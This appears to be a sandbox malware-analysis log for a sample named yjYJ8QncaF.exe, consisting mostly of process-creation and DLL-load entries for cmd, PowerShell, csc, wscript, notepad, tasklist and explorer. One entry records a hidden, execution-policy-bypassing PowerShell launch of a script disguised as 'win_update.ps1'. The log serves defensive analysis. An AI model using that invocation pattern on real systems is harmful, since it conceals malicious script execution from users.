Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP"

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
